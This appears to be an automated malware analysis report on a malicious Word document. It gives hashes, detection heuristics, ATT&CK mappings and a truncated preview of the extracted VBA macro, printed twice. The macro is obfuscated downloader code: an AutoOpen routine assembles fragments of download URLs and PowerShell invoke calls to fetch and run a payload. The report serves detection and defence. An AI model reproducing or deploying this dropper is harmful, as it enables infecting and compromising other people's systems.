Office (OLE) malware analysis — malicious · e1834f24a6c23a1c

MALICIOUS

Office (OLE)

174.5 KB Created: 2018-01-08 08:32:00 Authoring application: Microsoft Office Word First seen: 2018-01-23

MD5: 788e06e0c5d05c250112554074123eaa SHA-1: 5b779f5258655939297db9225ea39f796e397d89 SHA-256: e1834f24a6c23a1cd598e6f883113eb6660f856df27c87c4db32b6ac587eb078

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro utilizes the Shell() function, indicating an attempt to execute a secondary payload. ClamAV identified the file as 'Img.Dropper.PhishingLure-6443153-0', suggesting a dropper or phishing lure.

Heuristics 7

ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 58858 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	58858 bytes
SHA-256: `4425621d25c5bb44a2d20695daa15b18556c9f7ac7e8e15d82af3b05ecf07e39`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "JLziJYksQ" Sub AutoOpen() On Error Resume Next jAtulcdmw = 5151274 * Sqr(CpjSYUbBPNvGD) * WmXNWwjrRjz / CStr(2425590) * (7668841 / CDate(WjZmUNWbqnpsT) * 7346088 / ChrW(pltqTOpGZacNLY) * 9433465 * Int(MjiijnIlp)) EvwjYdits = 5378933 * Sqr(FWUdjdAMsALDtU) * MlHTCdHAPTt / CStr(4284393) * (82497 / CDate(zTTwwNpMFwCmvt) * 7809863 / ChrW(sDPvRtmYZVzVE) * 1958635 * Int(GAQuhsHuHnzf)) IRPhOMXbq = 1343637 * Sqr(iEjuWdP) * HvLvmfwHzl / CStr(1640070) * (1553739 / CDate(RNdHKnjJ) * 6479553 / ChrW(wAvlqAzkRrTs) * 7081237 * Int(VdCPEXqhwwNqDn)) LpjKZMOvq = 8879302 * Sqr(GBArQoZc) * lhlTEJsOBwY / CStr(9925372) * (9497789 / CDate(ZbLJSYiZ) * 7385811 / ChrW(HwVqqiIn) * 2703618 * Int(BiDMFPTzur)) Application.Run "wmZppak", OOFQbiTXjAb WIJraQEiG = 792932 * Sqr(MvdLGoCYSqklaI) * XwEDEiiulzoiPa / CStr(5707000) * (5772839 / CDate(JZpjaAwbRbcB) * 7253016 / ChrW(ijfsFZDzOh) * 91264 * Int(MRJmwoMCbBTMz)) zFbnHCtAc = 1178569 * Sqr(khXEiKKHihohRi) * npivhQTvHUb / CStr(2264867) * (1390496 / CDate(HsjLOCRRIYQ) * 8284226 / ChrW(dPJYJIfP) * 770929 * Int(hYiQlPjCw)) DcbpEVCcL = 4239480 * Sqr(KiqFqjwvRDcP) * aCmkmfB / CStr(4683688) * (4178749 / CDate(oiCZEDGjT) * 8763407 / ChrW(HCiZaFRolv) * 5180876 * Int(XPBiSqjUI)) oMCWnGusK = 4420514 * Sqr(VjTAEKLZ) * jkWNUiKCUopn / CStr(4762877) * (2826885 / CDate(qfCmwXwbY) * 3576700 / ChrW(rvBiIiGkYEqpC) * 1842680 * Int(rXWhUwRAKYHYaM)) End Sub Function OOFQbiTXjAb() On Error Resume Next GZmdCizPVm = ("XlsRbjectvY2+vY2 vY2+AIC+AICvY2randomvY2+vY2;C7gbcdvY2+vY2 = 3CvY2+vY2ShvY2+vY2ttvY2+vY2'+'p://wwvY2+vY2w.vY2+vY2kovY2+vY2ziolku.pl/omAIC+AICgr/,httpvY2+vY2AIC+AIC://www.svY2+vY2ca4christ6PSZMmZCRDT85kT1iUf") koDjqpYz = 7909871 * Sqr(AUPSVPbUQu) * imHpZwaRUE / CStr(5863982) * (8535884 / CDate(bNjpfdtUTD) * 3155296 / ChrW(cIpZoiLkKQhoT) * 6717197 * Int(DBVSVcprIilo)) oKFGFA = 7365054 * Sqr(DKjqBzo) * rfVTHOKfrWws / CStr(7947099) * (3690849 / CDate(luLmQjqDuYjGGw) * 9644049 / ChrW(lzSJpwCUa) * 6296597 * Int(qPruLkLwwpK)) XXLRPtisz = Mid(GZmdCizPVm, 5, 183) aqNzwY = ("zi53F2pasvY2+AIC+AICIE0TbRPMp9wp7ul9") RQVcrSLdM = 9858631 * Sqr(KhrdjVIAvTjt) * IICdXfjvrpzcdm / CStr(2527065) * (1427208 / CDate(ztwjRNFhwd) * 6330638 / ChrW(HqUFEftwKBj) * 3075915 * Int(SsuAGjvtVWqvM)) qIFHiw = 8100266 * Sqr(zwaCCUkzcWYGUI) * vJipzVLjp / CStr(8847805) * (7285220 / CDate(lUiKrpwBOajN) * 4219799 / ChrW(sRdicbkGajNW) * 8156894 * Int(lPlIQowfwL)) ziRVMPsfld = Mid(aqNzwY, 6, 15) ZAkEbZ = ("2XEs96YrcA.vY2+vY'+'2ToString(vY2+vY2), C7ghuas);InvY2+vY2vvY2+v'+'Y2ok'+'vY'+'2+vY2e-Item(C7ghuavY'+'2fw") JHdFrwJ = 4476511 * Sqr(iPZlFFFSXotF) * acWnKhrpP / CStr(5419442) * (3700556 / CDate(psJmHYz) * 4108499 / ChrW(phTaYlAZv) * 9338379 * Int(JtsTULVX)) oYfzAnQmn = 6100003 * Sqr(SnGhPMvjQQtjAk) * DNmvrQUfMuvAqR / CStr(9163541) * (620024 / CDate(pUXuMsIYEtf) * 6237315 / ChrW(ZtHXQwibo) * 6203408 * Int(HunUMFOUMQujNB)) jwGJYZC = Mid(ZAkEbZ, 11, 93) vCiUjGPEKH = ("T9LzuOY0U813D932OcRKAIC);vAIC+AICY2+vY2C7ghuvY2+vY2as = C7genv'+'Y2'+'+vY2vvY2+vAIC+AIC'+'Y2:pvY2+vY2uAIC+AICblic vY2AIC+AIC+vY2+AIC+AIC 3CSYlvY2+vY2F3CvY2+vY2S +vY2+vY2 CvY2+vY27gkavY2+vY2jAvz") whNqHWfK = 7485489 * Sqr(dfBppzwbTPzzi) * iXnXtNSna / CStr(6403556) * (7427668 / CDate(FHBOPsPSjc) * 8784944 / ChrW(bTplDdRtNaj) * 189718 * Int(SRZYpEUCUtp)) ZANPqK = 5033560 * Sqr(zEjMiCd) * vZYjjzPs / CStr(1574960) * (6038637 / CDate(AmzaptqXZa) * 1475048 / ChrW(zLwiNJBrhXR) * 4456044 * Int(BrFHFJMORZRBi)) PlWqmPujn = Mid(vCiUjGPEKH, 21, 169) hQOLNZ = ("RwriHzIwTwzPcC-JoiNAICAIC)'+'((AIC((vY2CAIC9FKB1Jk") QMwZEhrtTA = 9099050 * Sqr(QHOkTrn) * kEqTTYnnJnqpL / CStr(6048413) * (3010131 / CDate(RpqlHokBnJR) * 8619775 / ChrW(iNrFmmQzjIjno) * 7454875 * Int(kFulrmTi)) czsmz = 222664 * Sqr(ivUpfJG) * wbawkYtzihjKwT / CStr(388083) * (5290596 / CDate(iPjBCPjqD) * 764010 / ChrW ... (truncated)

SHA-256: 4425621d25c5bb44a2d20695daa15b18556c9f7ac7e8e15d82af3b05ecf07e39

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JLziJYksQ"
Sub AutoOpen()
On Error Resume Next
jAtulcdmw = 5151274 * Sqr(CpjSYUbBPNvGD) * WmXNWwjrRjz / CStr(2425590) * (7668841 / CDate(WjZmUNWbqnpsT) * 7346088 / ChrW(pltqTOpGZacNLY) * 9433465 * Int(MjiijnIlp))
EvwjYdits = 5378933 * Sqr(FWUdjdAMsALDtU) * MlHTCdHAPTt / CStr(4284393) * (82497 / CDate(zTTwwNpMFwCmvt) * 7809863 / ChrW(sDPvRtmYZVzVE) * 1958635 * Int(GAQuhsHuHnzf))
IRPhOMXbq = 1343637 * Sqr(iEjuWdP) * HvLvmfwHzl / CStr(1640070) * (1553739 / CDate(RNdHKnjJ) * 6479553 / ChrW(wAvlqAzkRrTs) * 7081237 * Int(VdCPEXqhwwNqDn))
LpjKZMOvq = 8879302 * Sqr(GBArQoZc) * lhlTEJsOBwY / CStr(9925372) * (9497789 / CDate(ZbLJSYiZ) * 7385811 / ChrW(HwVqqiIn) * 2703618 * Int(BiDMFPTzur))
Application.Run "wmZppak", OOFQbiTXjAb
WIJraQEiG = 792932 * Sqr(MvdLGoCYSqklaI) * XwEDEiiulzoiPa / CStr(5707000) * (5772839 / CDate(JZpjaAwbRbcB) * 7253016 / ChrW(ijfsFZDzOh) * 91264 * Int(MRJmwoMCbBTMz))
zFbnHCtAc = 1178569 * Sqr(khXEiKKHihohRi) * npivhQTvHUb / CStr(2264867) * (1390496 / CDate(HsjLOCRRIYQ) * 8284226 / ChrW(dPJYJIfP) * 770929 * Int(hYiQlPjCw))
DcbpEVCcL = 4239480 * Sqr(KiqFqjwvRDcP) * aCmkmfB / CStr(4683688) * (4178749 / CDate(oiCZEDGjT) * 8763407 / ChrW(HCiZaFRolv) * 5180876 * Int(XPBiSqjUI))
oMCWnGusK = 4420514 * Sqr(VjTAEKLZ) * jkWNUiKCUopn / CStr(4762877) * (2826885 / CDate(qfCmwXwbY) * 3576700 / ChrW(rvBiIiGkYEqpC) * 1842680 * Int(rXWhUwRAKYHYaM))
End Sub
Function OOFQbiTXjAb()
On Error Resume Next
GZmdCizPVm = ("XlsRbjectvY2+vY2 vY2+AIC+AICvY2randomvY2+vY2;C7gbcdvY2+vY2 = 3CvY2+vY2ShvY2+vY2ttvY2+vY2'+'p://wwvY2+vY2w.vY2+vY2kovY2+vY2ziolku.pl/omAIC+AICgr/,httpvY2+vY2AIC+AIC://www.svY2+vY2ca4christ6PSZMmZCRDT85kT1iUf")
koDjqpYz = 7909871 * Sqr(AUPSVPbUQu) * imHpZwaRUE / CStr(5863982) * (8535884 / CDate(bNjpfdtUTD) * 3155296 / ChrW(cIpZoiLkKQhoT) * 6717197 * Int(DBVSVcprIilo))
oKFGFA = 7365054 * Sqr(DKjqBzo) * rfVTHOKfrWws / CStr(7947099) * (3690849 / CDate(luLmQjqDuYjGGw) * 9644049 / ChrW(lzSJpwCUa) * 6296597 * Int(qPruLkLwwpK))
XXLRPtisz = Mid(GZmdCizPVm, 5, 183)
aqNzwY = ("zi53F2pasvY2+AIC+AICIE0TbRPMp9wp7ul9")
RQVcrSLdM = 9858631 * Sqr(KhrdjVIAvTjt) * IICdXfjvrpzcdm / CStr(2527065) * (1427208 / CDate(ztwjRNFhwd) * 6330638 / ChrW(HqUFEftwKBj) * 3075915 * Int(SsuAGjvtVWqvM))
qIFHiw = 8100266 * Sqr(zwaCCUkzcWYGUI) * vJipzVLjp / CStr(8847805) * (7285220 / CDate(lUiKrpwBOajN) * 4219799 / ChrW(sRdicbkGajNW) * 8156894 * Int(lPlIQowfwL))
ziRVMPsfld = Mid(aqNzwY, 6, 15)
ZAkEbZ = ("2XEs96YrcA.vY2+vY'+'2ToString(vY2+vY2), C7ghuas);InvY2+vY2vvY2+v'+'Y2ok'+'vY'+'2+vY2e-Item(C7ghuavY'+'2fw")
JHdFrwJ = 4476511 * Sqr(iPZlFFFSXotF) * acWnKhrpP / CStr(5419442) * (3700556 / CDate(psJmHYz) * 4108499 / ChrW(phTaYlAZv) * 9338379 * Int(JtsTULVX))
oYfzAnQmn = 6100003 * Sqr(SnGhPMvjQQtjAk) * DNmvrQUfMuvAqR / CStr(9163541) * (620024 / CDate(pUXuMsIYEtf) * 6237315 / ChrW(ZtHXQwibo) * 6203408 * Int(HunUMFOUMQujNB))
jwGJYZC = Mid(ZAkEbZ, 11, 93)
vCiUjGPEKH = ("T9LzuOY0U813D932OcRKAIC);vAIC+AICY2+vY2C7ghuvY2+vY2as = C7genv'+'Y2'+'+vY2vvY2+vAIC+AIC'+'Y2:pvY2+vY2uAIC+AICblic vY2AIC+AIC+vY2+AIC+AIC 3CSYlvY2+vY2F3CvY2+vY2S +vY2+vY2 CvY2+vY27gkavY2+vY2jAvz")
whNqHWfK = 7485489 * Sqr(dfBppzwbTPzzi) * iXnXtNSna / CStr(6403556) * (7427668 / CDate(FHBOPsPSjc) * 8784944 / ChrW(bTplDdRtNaj) * 189718 * Int(SRZYpEUCUtp))
ZANPqK = 5033560 * Sqr(zEjMiCd) * vZYjjzPs / CStr(1574960) * (6038637 / CDate(AmzaptqXZa) * 1475048 / ChrW(zLwiNJBrhXR) * 4456044 * Int(BrFHFJMORZRBi))
PlWqmPujn = Mid(vCiUjGPEKH, 21, 169)
hQOLNZ = ("RwriHzIwTwzPcC-JoiNAICAIC)'+'((AIC((vY2CAIC9FKB1Jk")
QMwZEhrtTA = 9099050 * Sqr(QHOkTrn) * kEqTTYnnJnqpL / CStr(6048413) * (3010131 / CDate(RpqlHokBnJR) * 8619775 / ChrW(iNrFmmQzjIjno) * 7454875 * Int(kFulrmTi))
czsmz = 222664 * Sqr(ivUpfJG) * wbawkYtzihjKwT / CStr(388083) * (5290596 / CDate(iPjBCPjqD) * 764010 / ChrW
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.